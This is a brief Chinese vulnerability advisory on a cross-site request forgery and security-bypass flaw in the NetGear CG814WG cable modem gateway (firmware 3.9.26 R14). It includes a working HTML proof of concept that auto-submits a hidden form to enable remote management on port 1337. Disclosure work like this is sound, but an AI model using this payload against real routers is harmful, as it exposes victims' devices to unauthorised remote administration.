漏洞起因
设计错误
危险等级
低
影响系统
NetGear Wireless Cable Modem Gateway CG814WG 3.9.26 R14
不受影响系统
NetGear Wireless Cable Modem Gateway CG814WG 3.9.26 R15
危害
远程攻击者可以利用漏洞绕过安全限制或执行管理操作。
攻击所需条件
攻击者必须访问NETGEAR Wireless Cable Modem Gateway或构建恶意链接,诱使用户解析。
漏洞信息
NETGEAR Wireless Cable Modem Gateway是一款无线电缆调制解调器网关。
NETGEAR Wireless Cable Modem Gateway存在跨站请求伪造和安全绕过漏洞,利用这些漏洞允许远程攻击者执行管理员操作。绕过安全限制,获得对受影响设备的未授权访问或删除部分数据。
测试方法
<html>
<head></head>
<body onLoad=javascript:document.form.submit()>
<form action="http://192.168.0.1/goform/RgRemoteManagement"
method="POST" name="form">
<input type="hidden" name="NetgearRmEnable" value="0x01">
<input type="hidden" name="NetgearRmPortNumber" value="1337">
<input type="hidden" name="NetgearUserLevel" value="1">
</form>
</body>
</html>
厂商解决方案
目前没有详细解决方案提供:
http://www.netgear.com/
漏洞提供者
Sense of Security Labs
0 条评论。